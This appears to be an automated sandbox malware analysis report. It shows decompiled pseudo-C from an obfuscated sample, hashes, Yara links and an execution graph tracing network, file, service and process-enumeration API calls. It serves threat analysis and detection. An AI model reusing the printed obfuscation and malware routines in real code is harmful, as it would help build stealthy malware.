                                                                                                            • Instruction Fuzzy Hash: 1211DFB2C04208BBCB01EFE4D94A8DEBFB4EF45300F108488E92566262D3758B20EF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E408C3 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 475 e408c3-e40950 call e252f2 ExitProcess
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00E408C3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t32;
				void* _t33;

				_v20 = 0xba35d;
				_v16 = 0x2c63f;
				_v8 = 0x18668b;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x77;
				_v8 = _v8 + 0xffff88d8;
				_v8 = _v8 ^ 0xabd92865;
				_v12 = 0xa923ab;
				_v12 = _v12 + 0xffffe870;
				_v12 = _v12 ^ 0x2e66d6cd;
				_v12 = _v12 ^ 0x2eca4b61;
				_v16 = 0xa7f2df;
				_v16 = _v16 + 0xffff74c1;
				_v16 = _v16 ^ 0x00a03459;
				E00E252F2(_t32, _t33, _t32, 0xc1, 0x82522eb8, 0x9f49d153);
				ExitProcess(0);
			}









                                                                                                            0x00e408c9
                                                                                                            0x00e408d0
                                                                                                            0x00e408d7
                                                                                                            0x00e408de
                                                                                                            0x00e408f6
                                                                                                            0x00e408f9
                                                                                                            0x00e40900
                                                                                                            0x00e40907
                                                                                                            0x00e4090e
                                                                                                            0x00e40915
                                                                                                            0x00e4091c
                                                                                                            0x00e40923
                                                                                                            0x00e4092a
                                                                                                            0x00e40931
                                                                                                            0x00e40941
                                                                                                            0x00e4094b

                                                                                                            APIs
                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 00E4094B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.384673392.0000000000E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.384668956.0000000000E20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.384706869.0000000000E42000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_e20000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 621844428-0
                                                                                                            • Opcode ID: 1d89245fcaf8bc8bfc49024291ef06cfa865d6d529eb9dfc713b0c2537c2a249
                                                                                                            • Instruction ID: 4e4341be0ed301b31adee68a89e7af02b84e16576038f721e5e4b1a6f1707dae
                                                                                                            • Opcode Fuzzy Hash: 1d89245fcaf8bc8bfc49024291ef06cfa865d6d529eb9dfc713b0c2537c2a249
                                                                                                            • Instruction Fuzzy Hash: A90104B1D4130CFBDB44DFE9E94A98DBBB0EB10714F2081899824B7290D3B44B549F44
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:21.7%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:1.1%
                                                                                                            Total number of Nodes:474
                                                                                                            Total number of Limit Nodes:29
                                                                                                            execution_graph 3784 4d4cbe5 3790 4d4cc09 3784->3790 3786 4d4d589 3787 4d4d6a7 RtlAllocateHeap 3787->3790 3789 4d3845b RtlFreeHeap 3789->3790 3790->3786 3790->3787 3790->3789 3791 4d4e4b2 3790->3791 3795 4d43ee6 3790->3795 3792 4d4e4c7 3791->3792 3799 4d489c9 3792->3799 3794 4d4e5c7 3794->3790 3796 4d43f44 3795->3796 3802 4d32cc4 3796->3802 3798 4d43fc0 3798->3790 3800 4d489e1 3799->3800 3801 4d48a5a RtlFreeHeap 3800->3801 3801->3794 3803 4d32ce0 3802->3803 3804 4d32d5e RtlAllocateHeap 3803->3804 3804->3798 3805 4d4bc49 3808 4d36c5e 3805->3808 3807 4d4bc88 3810 4d36c88 3808->3810 3814 4d38358 3810->3814 3816 4d38424 3810->3816 3820 4d49d9d RtlAllocateHeap 3810->3820 3824 4d4e4b2 RtlFreeHeap 3810->3824 3827 4d32ef6 RtlAllocateHeap 3810->3827 3828 4d383af 3810->3828 3830 4d383b4 3810->3830 3841 4d3845b RtlFreeHeap 3810->3841 3842 4d42fb9 3810->3842 3847 4d39587 3810->3847 3852 4d460fa 3810->3852 3861 4d4e5d0 3810->3861 3865 4d39de0 3810->3865 3870 4d47eb9 3810->3870 3880 4d50559 3810->3880 3885 4d4d81a 3810->3885 3890 4d39bde 3810->3890 3894 4d31d5c 3810->3894 3903 4d4dc5f 3810->3903 3908 4d44093 3810->3908 3912 4d4630a 3810->3912 3917 4d34a11 3810->3917 3924 4d4202d 3810->3924 3932 4d3c26d 3810->3932 3937 4d46f79 3810->3937 3945 4d4ffac 3810->3945 3956 4d4fc6f 3810->3956 3960 4d50406 3810->3960 3963 4d4d8fe 3810->3963 3971 4d32c6b 3814->3971 3982 4d47915 3816->3982 3820->3810 3824->3810 3827->3810 3828->3807 3975 4d3bb44 3830->3975 3841->3810 3844 4d42ff9 3842->3844 3845 4d431eb 3844->3845 3846 4d43ee6 RtlAllocateHeap 3844->3846 3989 4d4c75f 3844->3989 3845->3810 3846->3844 3848 4d395a5 3847->3848 3849 4d39975 3848->3849 3850 4d4e4b2 RtlFreeHeap 3848->3850 4006 4d33fe5 3848->4006 3849->3810 3850->3848 3860 4d4611a 3852->3860 3853 4d43ee6 RtlAllocateHeap 3853->3860 3855 4d46279 3856 4d4e4b2 RtlFreeHeap 3855->3856 3858 4d46277 3856->3858 3858->3810 3860->3853 3860->3855 3860->3858 4010 4d40eaf 3860->4010 4014 4d337fa 3860->4014 4023 4d3864d 3860->4023 3863 4d4e60d 3861->3863 3862 4d4e700 3862->3810 3863->3862 3864 4d356ad RtlAllocateHeap RtlFreeHeap LoadLibraryW 3863->3864 3864->3863 3867 4d39e0a 3865->3867 3868 4d43ee6 RtlAllocateHeap 3867->3868 3869 4d3a113 3867->3869 4070 4d47e14 3867->4070 3868->3867 3869->3810 3872 4d47ee4 3870->3872 3871 4d4d6a7 RtlAllocateHeap 3871->3872 3872->3871 3873 4d43ee6 RtlAllocateHeap 3872->3873 3874 4d47f1d 3872->3874 3876 4d3845b RtlFreeHeap 3872->3876 3877 4d48000 3872->3877 3873->3872 3875 4d4e4b2 RtlFreeHeap 3874->3875 3878 4d47f97 3875->3878 3876->3872 3877->3810 3879 4d4e4b2 RtlFreeHeap 3878->3879 3879->3877 3883 4d50586 3880->3883 3881 4d507d0 3881->3810 3883->3881 4073 4d3c853 3883->4073 4076 4d44658 3883->4076 3888 4d4d850 3885->3888 3887 4d43ee6 RtlAllocateHeap 3887->3888 3888->3887 3889 4d4d8f4 3888->3889 4095 4d432c5 3888->4095 3889->3810 3892 4d39c1e 3890->3892 3891 4d39dca 3891->3810 3892->3891 4115 4d46cbc 3892->4115 3895 4d31d97 3894->3895 3900 4d323e9 3895->3900 3902 4d4e4b2 RtlFreeHeap 3895->3902 4118 4d4b45c 3895->4118 4126 4d35d99 3895->4126 4137 4d38da4 3895->4137 4145 4d424f9 3895->4145 4155 4d3e942 3895->4155 3900->3810 3902->3895 3906 4d4dc81 3903->3906 3904 4d38b6c FindCloseChangeNotification 3904->3906 3905 4d4602c CreateFileW 3905->3906 3906->3904 3906->3905 3907 4d4e033 3906->3907 3907->3810 3911 4d440ae 3908->3911 3909 4d4447a 3909->3810 3910 4d43ee6 RtlAllocateHeap 3910->3911 3911->3909 3911->3910 3913 4d4633c 3912->3913 3914 4d4d6a7 RtlAllocateHeap 3913->3914 3915 4d46b2b 3913->3915 3916 4d3845b RtlFreeHeap 3913->3916 3914->3913 3915->3810 3916->3913 3919 4d34a42 3917->3919 3918 4d4d6a7 RtlAllocateHeap 3918->3919 3919->3918 3921 4d35287 3919->3921 3922 4d3845b RtlFreeHeap 3919->3922 3923 4d47e14 OpenSCManagerW 3919->3923 4218 4d40f57 3919->4218 3921->3810 3922->3919 3923->3919 3929 4d42055 3924->3929 3925 4d4d6a7 RtlAllocateHeap 3925->3929 3926 4d42086 4225 4d3e51f 3926->4225 3927 4d4245b 3927->3927 3929->3925 3929->3926 3929->3927 3930 4d3845b RtlFreeHeap 3929->3930 3930->3929 3931 4d42110 3931->3810 3935 4d3c2c2 3932->3935 3933 4d4d6a7 RtlAllocateHeap 3933->3935 3934 4d3c7d0 3934->3810 3935->3933 3935->3934 3936 4d3845b RtlFreeHeap 3935->3936 3936->3935 3941 4d46fa3 3937->3941 3938 4d4752f 3938->3810 3939 4d4d6a7 RtlAllocateHeap 3939->3941 3940 4d47531 3942 4d38b6c FindCloseChangeNotification 3940->3942 3941->3938 3941->3939 3941->3940 3943 4d4602c CreateFileW 3941->3943 3944 4d3845b RtlFreeHeap 3941->3944 3942->3938 3943->3941 3944->3941 3951 4d4ffc4 3945->3951 3947 4d50339 3947->3810 3951->3947 3955 4d43ee6 RtlAllocateHeap 3951->3955 4231 4d401bf 3951->4231 4243 4d33023 3951->4243 4255 4d43711 3951->4255 4259 4d3a7c4 3951->4259 4264 4d48fb0 3951->4264 4281 4d3ced3 3951->4281 4289 4d3b704 3951->4289 3955->3951 3958 4d4fca1 3956->3958 3957 4d47e14 OpenSCManagerW 3957->3958 3958->3957 3959 4d4fcf3 3958->3959 3959->3810 3961 4d43ee6 RtlAllocateHeap 3960->3961 3962 4d50468 3961->3962 3962->3810 3965 4d4d933 3963->3965 3964 4d4d6a7 RtlAllocateHeap 3964->3965 3965->3964 3966 4d4d956 3965->3966 3967 4d4dc5a 3965->3967 3970 4d3845b RtlFreeHeap 3965->3970 4317 4d4169d 3966->4317 3967->3967 3970->3965 3972 4d32c84 3971->3972 3973 4d3a7c4 2 API calls 3972->3973 3974 4d32cbf 3973->3974 3974->3828 3981 4d3bb65 3975->3981 3976 4d3c198 3977 4d43b17 FindCloseChangeNotification 3976->3977 3979 4d3c193 3977->3979 3978 4d4d6a7 RtlAllocateHeap 3978->3981 3979->3828 3980 4d3845b RtlFreeHeap 3980->3981 3981->3976 3981->3978 3981->3979 3981->3980 3987 4d47944 3982->3987 3984 4d4fc6f OpenSCManagerW 3984->3987 3985 4d47d44 3985->3828 3986 4d4d6a7 RtlAllocateHeap 3986->3987 3987->3984 3987->3985 3987->3986 3988 4d3845b RtlFreeHeap 3987->3988 4342 4d4481a 3987->4342 3988->3987 3990 4d4c787 3989->3990 3991 4d4c80a CreateThread 3990->3991 3991->3844 3992 4d342b2 3991->3992 3999 4d342e8 3992->3999 3993 4d43ee6 RtlAllocateHeap 3993->3999 3994 4d4e4b2 RtlFreeHeap 3994->3999 3995 4d34983 4003 4d38b6c 3995->4003 3998 4d34981 3999->3993 3999->3994 3999->3995 3999->3998 4000 4d4602c 3999->4000 4001 4d4605c 4000->4001 4002 4d460e1 CreateFileW 4001->4002 4002->3999 4004 4d38b82 4003->4004 4005 4d38bfc FindCloseChangeNotification 4004->4005 4005->3998 4007 4d33fff 4006->4007 4008 4d341c7 4007->4008 4009 4d43ee6 RtlAllocateHeap 4007->4009 4008->3848 4009->4007 4011 4d40ec5 4010->4011 4027 4d3a528 4011->4027 4019 4d3381b 4014->4019 4017 4d33c5e 4020 4d4e4b2 RtlFreeHeap 4017->4020 4018 4d33cd6 4018->3860 4019->4017 4019->4018 4022 4d43ee6 RtlAllocateHeap 4019->4022 4058 4d4d6a7 4019->4058 4062 4d3845b 4019->4062 4066 4d32ef6 4019->4066 4020->4018 4022->4019 4024 4d386e7 4023->4024 4025 4d3866d 4023->4025 4024->3860 4025->4024 4026 4d4e4b2 RtlFreeHeap 4025->4026 4026->4025 4030 4d3a544 4027->4030 4029 4d43ee6 RtlAllocateHeap 4029->4030 4030->4029 4032 4d3a5a9 4030->4032 4035 4d3a62f 4030->4035 4036 4d3db9b 4030->4036 4041 4d3a9d2 4030->4041 4047 4d4bdb0 4030->4047 4034 4d4e4b2 RtlFreeHeap 4032->4034 4034->4035 4035->3860 4037 4d3dbbc 4036->4037 4038 4d3dbe8 4037->4038 4039 4d4d6a7 RtlAllocateHeap 4037->4039 4040 4d3845b RtlFreeHeap 4037->4040 4038->4030 4039->4037 4040->4037 4045 4d3aa0a 4041->4045 4043 4d3b67c 4043->4030 4044 4d4d6a7 RtlAllocateHeap 4044->4045 4045->4043 4045->4044 4046 4d3845b RtlFreeHeap 4045->4046 4051 4d4a0f3 4045->4051 4046->4045 4048 4d4be39 4047->4048 4049 4d4e4b2 RtlFreeHeap 4048->4049 4050 4d4beae 4049->4050 4050->4030 4056 4d4a12a 4051->4056 4052 4d4e4b2 RtlFreeHeap 4052->4056 4053 4d4b097 4053->4045 4054 4d43ee6 RtlAllocateHeap 4054->4056 4055 4d4d6a7 RtlAllocateHeap 4055->4056 4056->4052 4056->4053 4056->4054 4056->4055 4057 4d3845b RtlFreeHeap 4056->4057 4057->4056 4059 4d4d6c2 4058->4059 4060 4d43ee6 RtlAllocateHeap 4059->4060 4061 4d4d79e 4060->4061 4061->4019 4061->4061 4063 4d38471 4062->4063 4064 4d4e4b2 RtlFreeHeap 4063->4064 4065 4d384fd 4064->4065 4065->4019 4067 4d32f15 4066->4067 4068 4d43ee6 RtlAllocateHeap 4067->4068 4069 4d32fd2 4068->4069 4069->4019 4069->4069 4071 4d47e31 4070->4071 4072 4d47eaa OpenSCManagerW 4071->4072 4072->3867 4080 4d3e214 4073->4080 4077 4d4467e 4076->4077 4078 4d38b6c FindCloseChangeNotification 4077->4078 4079 4d4480f 4077->4079 4078->4079 4079->3883 4081 4d3e240 4080->4081 4082 4d3e497 4081->4082 4083 4d3c8e6 4081->4083 4087 4d49d01 4081->4087 4090 4d49941 4081->4090 4084 4d38b6c FindCloseChangeNotification 4082->4084 4083->3883 4084->4083 4088 4d49d1a 4087->4088 4089 4d49d8e Process32FirstW 4088->4089 4089->4081 4093 4d352f2 4090->4093 4092 4d499ce CreateToolhelp32Snapshot 4092->4081 4094 4d3531f 4093->4094 4094->4092 4096 4d432e3 4095->4096 4098 4d4361d 4096->4098 4104 4d4b0a4 4096->4104 4098->4098 4099 4d43383 4108 4d48d6c 4099->4108 4101 4d433d1 4102 4d3845b RtlFreeHeap 4101->4102 4103 4d43510 4102->4103 4103->3888 4105 4d4b0b7 4104->4105 4106 4d43ee6 RtlAllocateHeap 4105->4106 4107 4d4b18c 4106->4107 4107->4099 4107->4107 4110 4d48e0c 4108->4110 4109 4d48eea 4109->4101 4110->4109 4112 4d4b3a1 4110->4112 4113 4d4b3cc 4112->4113 4114 4d4b446 GetVolumeInformationW 4113->4114 4114->4109 4116 4d46ccf 4115->4116 4117 4d46d49 GetNativeSystemInfo 4116->4117 4117->3892 4124 4d4b48d 4118->4124 4119 4d4e4b2 RtlFreeHeap 4119->4124 4120 4d43ee6 RtlAllocateHeap 4120->4124 4121 4d4b9cc 4121->3895 4123 4d4d6a7 RtlAllocateHeap 4123->4124 4124->4119 4124->4120 4124->4121 4124->4123 4125 4d3845b RtlFreeHeap 4124->4125 4168 4d453d5 4124->4168 4125->4124 4136 4d35dd5 4126->4136 4127 4d39a95 InternetCloseHandle 4127->4136 4131 4d36c54 4131->3895 4132 4d4d6a7 RtlAllocateHeap 4132->4136 4133 4d4e4b2 RtlFreeHeap 4133->4136 4135 4d3845b RtlFreeHeap 4135->4136 4136->4127 4136->4131 4136->4132 4136->4133 4136->4135 4172 4d4a036 4136->4172 4175 4d391d6 4136->4175 4183 4d42e17 4136->4183 4186 4d48a6a 4136->4186 4144 4d38dc1 4137->4144 4139 4d39150 4139->3895 4140 4d39152 4141 4d4e4b2 RtlFreeHeap 4140->4141 4141->4139 4143 4d43ee6 RtlAllocateHeap 4143->4144 4144->4139 4144->4140 4144->4143 4192 4d4c234 4144->4192 4196 4d44d2b 4144->4196 4154 4d42520 4145->4154 4146 4d43ee6 RtlAllocateHeap 4146->4154 4147 4d4e4b2 RtlFreeHeap 4147->4154 4148 4d42c35 4152 4d4e4b2 RtlFreeHeap 4148->4152 4150 4d42c33 4150->3895 4151 4d4cbe5 2 API calls 4151->4154 4152->4150 4154->4146 4154->4147 4154->4148 4154->4150 4154->4151 4208 4d45d5e 4154->4208 4212 4d3593c 4154->4212 4165 4d3e96f 4155->4165 4156 4d43ee6 RtlAllocateHeap 4156->4165 4157 4d3f5c8 4159 4d4b0a4 RtlAllocateHeap 4157->4159 4158 4d4d6a7 RtlAllocateHeap 4158->4165 4163 4d3f623 4159->4163 4160 4d3f550 4162 4d4e4b2 RtlFreeHeap 4160->4162 4161 4d3f54b 4161->3895 4162->4161 4166 4d3845b RtlFreeHeap 4163->4166 4164 4d4b0a4 RtlAllocateHeap 4164->4165 4165->4156 4165->4157 4165->4158 4165->4160 4165->4161 4165->4164 4167 4d3845b RtlFreeHeap 4165->4167 4166->4161 4167->4165 4170 4d453ef 4168->4170 4169 4d43ee6 RtlAllocateHeap 4169->4170 4170->4169 4171 4d4543b 4170->4171 4171->4124 4173 4d4a057 4172->4173 4174 4d4a0e2 InternetOpenW 4173->4174 4174->4136 4181 4d39218 4175->4181 4176 4d43ee6 RtlAllocateHeap 4176->4181 4178 4d39504 4179 4d3950c 4178->4179 4180 4d4e4b2 RtlFreeHeap 4178->4180 4179->4136 4180->4179 4181->4176 4181->4178 4182 4d4e4b2 RtlFreeHeap 4181->4182 4189 4d3f766 4181->4189 4182->4181 4184 4d42e49 4183->4184 4185 4d42ec1 HttpOpenRequestW 4184->4185 4185->4136 4187 4d48aa4 4186->4187 4188 4d48b3c InternetConnectW 4187->4188 4188->4136 4190 4d3f785 4189->4190 4191 4d3f812 InternetReadFile 4190->4191 4191->4181 4193 4d4c24e 4192->4193 4195 4d4c287 4193->4195 4201 4d4cbe5 4193->4201 4195->4144 4198 4d44d4d 4196->4198 4197 4d4e4b2 RtlFreeHeap 4197->4198 4198->4197 4199 4d43ee6 RtlAllocateHeap 4198->4199 4200 4d4517b 4198->4200 4199->4198 4200->4144 4207 4d4cc09 4201->4207 4202 4d43ee6 RtlAllocateHeap 4202->4207 4203 4d4d589 4203->4193 4204 4d4d6a7 RtlAllocateHeap 4204->4207 4205 4d4e4b2 RtlFreeHeap 4205->4207 4206 4d3845b RtlFreeHeap 4206->4207 4207->4202 4207->4203 4207->4204 4207->4205 4207->4206 4210 4d45d7e 4208->4210 4209 4d43ee6 RtlAllocateHeap 4209->4210 4210->4209 4211 4d45f93 4210->4211 4211->4154 4215 4d35959 4212->4215 4213 4d43ee6 RtlAllocateHeap 4213->4215 4214 4d359ac 4216 4d4e4b2 RtlFreeHeap 4214->4216 4215->4213 4215->4214 4217 4d35a33 4215->4217 4216->4217 4217->4154 4219 4d40f77 4218->4219 4220 4d4163b 4219->4220 4221 4d41693 4219->4221 4223 4d43ee6 RtlAllocateHeap 4219->4223 4224 4d4e4b2 RtlFreeHeap 4219->4224 4222 4d4e4b2 RtlFreeHeap 4220->4222 4221->3919 4222->4221 4223->4219 4224->4219 4226 4d3e539 4225->4226 4227 4d4d6a7 RtlAllocateHeap 4226->4227 4228 4d3e5b9 4227->4228 4229 4d3845b RtlFreeHeap 4228->4229 4230 4d3e6aa 4229->4230 4230->3931 4235 4d40225 4231->4235 4233 4d453d5 RtlAllocateHeap 4233->4235 4234 4d40e3b 4237 4d38b6c FindCloseChangeNotification 4234->4237 4235->4233 4235->4234 4238 4d40e39 4235->4238 4239 4d4d6a7 RtlAllocateHeap 4235->4239 4240 4d4e4b2 RtlFreeHeap 4235->4240 4241 4d3845b RtlFreeHeap 4235->4241 4293 4d4e71c 4235->4293 4297 4d475ad 4235->4297 4302 4d43b17 4235->4302 4237->4238 4238->3951 4239->4235 4240->4235 4241->4235 4253 4d3304e 4243->4253 4244 4d333f8 4246 4d4d6a7 RtlAllocateHeap 4244->4246 4245 4d333f3 4245->3951 4247 4d3359d 4246->4247 4249 4d3845b RtlFreeHeap 4247->4249 4248 4d4d6a7 RtlAllocateHeap 4248->4253 4250 4d33736 4249->4250 4251 4d43b17 FindCloseChangeNotification 4250->4251 4251->4245 4252 4d3845b RtlFreeHeap 4252->4253 4253->4244 4253->4245 4253->4248 4253->4252 4254 4d475ad 2 API calls 4253->4254 4254->4253 4257 4d43740 4255->4257 4256 4d4c75f 5 API calls 4256->4257 4257->4256 4258 4d43775 4257->4258 4258->3951 4262 4d3a7f8 4259->4262 4260 4d3a9c5 4260->3951 4261 4d4e4b2 RtlFreeHeap 4261->4262 4262->4260 4262->4261 4263 4d38b6c FindCloseChangeNotification 4262->4263 4263->4262 4279 4d48fd7 4264->4279 4266 4d4974d 4267 4d43b17 FindCloseChangeNotification 4266->4267 4268 4d4983f 4267->4268 4270 4d496e1 4268->4270 4274 4d38b6c FindCloseChangeNotification 4268->4274 4269 4d496e6 4272 4d38b6c FindCloseChangeNotification 4269->4272 4270->3951 4272->4270 4273 4d38b6c FindCloseChangeNotification 4273->4279 4275 4d498bf 4274->4275 4276 4d38b6c FindCloseChangeNotification 4275->4276 4276->4270 4277 4d4d6a7 RtlAllocateHeap 4277->4279 4278 4d3845b RtlFreeHeap 4278->4279 4279->4266 4279->4269 4279->4270 4279->4273 4279->4277 4279->4278 4280 4d475ad 2 API calls 4279->4280 4308 4d4bf4c 4279->4308 4312 4d3260b 4279->4312 4280->4279 4287 4d3ceff 4281->4287 4282 4d3d294 4283 4d43b17 FindCloseChangeNotification 4282->4283 4284 4d3d28f 4283->4284 4284->3951 4285 4d4d6a7 RtlAllocateHeap 4285->4287 4286 4d3845b RtlFreeHeap 4286->4287 4287->4282 4287->4284 4287->4285 4287->4286 4288 4d475ad 2 API calls 4287->4288 4288->4287 4292 4d3b72e 4289->4292 4290 4d4c75f 5 API calls 4290->4292 4291 4d3b767 4291->3951 4292->4290 4292->4291 4295 4d4e738 4293->4295 4294 4d4e8b9 4294->4235 4295->4294 4296 4d43ee6 RtlAllocateHeap 4295->4296 4296->4295 4300 4d475c4 4297->4300 4298 4d38b6c FindCloseChangeNotification 4298->4300 4299 4d4602c CreateFileW 4299->4300 4300->4298 4300->4299 4301 4d47860 4300->4301 4301->4235 4303 4d43b43 4302->4303 4304 4d43d4a 4303->4304 4305 4d38b6c FindCloseChangeNotification 4303->4305 4304->4235 4306 4d43dbe 4305->4306 4307 4d38b6c FindCloseChangeNotification 4306->4307 4307->4304 4309 4d4bf75 4308->4309 4310 4d38b6c FindCloseChangeNotification 4309->4310 4311 4d4c1bb 4309->4311 4310->4311 4311->4279 4313 4d3264a 4312->4313 4314 4d32b18 4313->4314 4315 4d4d6a7 RtlAllocateHeap 4313->4315 4316 4d3845b RtlFreeHeap 4313->4316 4314->4279 4315->4313 4316->4313 4324 4d416d8 4317->4324 4320 4d41d96 4320->3810 4321 4d4d6a7 RtlAllocateHeap 4321->4324 4323 4d3845b RtlFreeHeap 4323->4324 4324->4320 4324->4321 4324->4323 4325 4d4169d 5 API calls 4324->4325 4327 4d31b61 4324->4327 4330 4d3d8e0 4324->4330 4336 4d4c56f 4324->4336 4339 4d48b54 4324->4339 4325->4324 4328 4d31b7a 4327->4328 4329 4d31bf7 FindFirstFileW 4328->4329 4329->4324 4331 4d3d93b 4330->4331 4332 4d4d6a7 RtlAllocateHeap 4331->4332 4335 4d3db4b 4331->4335 4333 4d3da2d 4332->4333 4334 4d3845b RtlFreeHeap 4333->4334 4334->4335 4335->4324 4337 4d4c588 4336->4337 4338 4d4c61b FindNextFileW 4337->4338 4338->4324 4340 4d48b67 4339->4340 4341 4d48bf7 FindClose 4340->4341 4341->4324 4344 4d44846 4342->4344 4343 4d4d6a7 RtlAllocateHeap 4343->4344 4344->4343 4345 4d44bf1 4344->4345 4346 4d3845b RtlFreeHeap 4344->4346 4345->3987 4346->4344 4347 4d3fbdd 4348 4d3fc01 4347->4348 4349 4d4b0a4 RtlAllocateHeap 4348->4349 4352 4d3fd24 4348->4352 4350 4d3fc49 4349->4350 4351 4d3845b RtlFreeHeap 4350->4351 4351->4352

                                                                                                            Executed Functions

                                                                                                            Function 04D49941 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E04D49941(int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t48;
				signed int _t49;
				signed int _t50;

				_v16 = 0x5eef3;
				_v16 = 0x83cb5a;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0xf2dffda8;
				_v12 = 0xb21851;
				_v12 = _v12 ^ 0x1822d71c;
				_v12 = _v12 + 0x40f9;
				_t49 = 0x60;
				_v12 = _v12 / _t49;
				_v12 = _v12 ^ 0x004c577a;
				_v8 = 0x8c2a75;
				_v8 = _v8 << 0xa;
				_t50 = 0x63;
				_v8 = _v8 * 0x3b;
				_v8 = _v8 / _t50;
				_v8 = _v8 ^ 0x00852749;
				E04D352F2(_t50, _v8 % _t50, _t50, 0x13, 0xb4af59f1, 0x9f49d153);
				_t48 = CreateToolhelp32Snapshot(_a4, 0); // executed
				return _t48;
			}









                                                                                                            0x04d49947
                                                                                                            0x04d49950
                                                                                                            0x04d49957
                                                                                                            0x04d4995b
                                                                                                            0x04d4995f
                                                                                                            0x04d49966
                                                                                                            0x04d4996d
                                                                                                            0x04d49974
                                                                                                            0x04d49980
                                                                                                            0x04d49985
                                                                                                            0x04d4998a
                                                                                                            0x04d49991
                                                                                                            0x04d49998
                                                                                                            0x04d499a0
                                                                                                            0x04d499ad
                                                                                                            0x04d499b6
                                                                                                            0x04d499b9
                                                                                                            0x04d499c9
                                                                                                            0x04d499d6
                                                                                                            0x04d499db

                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(004C577A,00000000), ref: 04D499D6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateSnapshotToolhelp32
                                                                                                            • String ID: zWL
                                                                                                            • API String ID: 3332741929-750252732
                                                                                                            • Opcode ID: cad5d06995fb521708466434498b440f5308f1c900df44b08e8f6c5afc20bf3b
                                                                                                            • Instruction ID: 324665655c1740eab9f0873d9bd60153cf84c8c10e4ee49bffb0bfe754d08330
                                                                                                            • Opcode Fuzzy Hash: cad5d06995fb521708466434498b440f5308f1c900df44b08e8f6c5afc20bf3b
                                                                                                            • Instruction Fuzzy Hash: 6D112776E0020CFBDB04CFE9E98AA9DBBB1EB40704F20C099E515AB250D7B56B589F44
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04D3F766 Relevance: 1.6, APIs: 1, Instructions: 52filenetworkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 72%
                                                                                                            			E04D3F766(void* __ecx, void* __edx, DWORD* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, long _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t41;
				int _t49;
				signed int _t51;
				void* _t55;

				_push(_a20);
				_t55 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E04D432C4(_t41);
				_v20 = 0x1305f;
				_v16 = 0x53301;
				_v8 = 0x62a79b;
				_t51 = 0x4c;
				_v8 = _v8 / _t51;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 + 0x7db3;
				_v8 = _v8 ^ 0x000f9f1d;
				_v16 = 0xcda3ee;
				_v16 = _v16 ^ 0x2b4bce83;
				_v16 = _v16 | 0x7c437fde;
				_v16 = _v16 ^ 0x7fc82022;
				_v12 = 0x3c13cb;
				_v12 = _v12 + 0xffff6e52;
				_v12 = _v12 | 0x4b50b859;
				_v12 = _v12 ^ 0x4b7f303f;
				E04D352F2(_t51, _v8 % _t51, _t51, 0xc5, 0xff3fbd3a, 0xfd56727);
				_t49 = InternetReadFile(_t55, _a16, _a20, _a4); // executed
				return _t49;
			}











                                                                                                            0x04d3f76d
                                                                                                            0x04d3f770
                                                                                                            0x04d3f772
                                                                                                            0x04d3f775
                                                                                                            0x04d3f778
                                                                                                            0x04d3f77b
                                                                                                            0x04d3f77e
                                                                                                            0x04d3f780
                                                                                                            0x04d3f785
                                                                                                            0x04d3f78f
                                                                                                            0x04d3f798
                                                                                                            0x04d3f7a4
                                                                                                            0x04d3f7ac
                                                                                                            0x04d3f7af
                                                                                                            0x04d3f7b3
                                                                                                            0x04d3f7ba
                                                                                                            0x04d3f7c1
                                                                                                            0x04d3f7c8
                                                                                                            0x04d3f7cf
                                                                                                            0x04d3f7d6
                                                                                                            0x04d3f7dd
                                                                                                            0x04d3f7e4
                                                                                                            0x04d3f7eb
                                                                                                            0x04d3f7f2
                                                                                                            0x04d3f80d
                                                                                                            0x04d3f81f
                                                                                                            0x04d3f825

                                                                                                            APIs
                                                                                                            • InternetReadFile.WININET(?,00F6F1C1,?,4B7F303F,?,?,?,?,?,?,?,?,?,?,00F6F1C1), ref: 04D3F81F
                                                                                                            Memory Dump Source
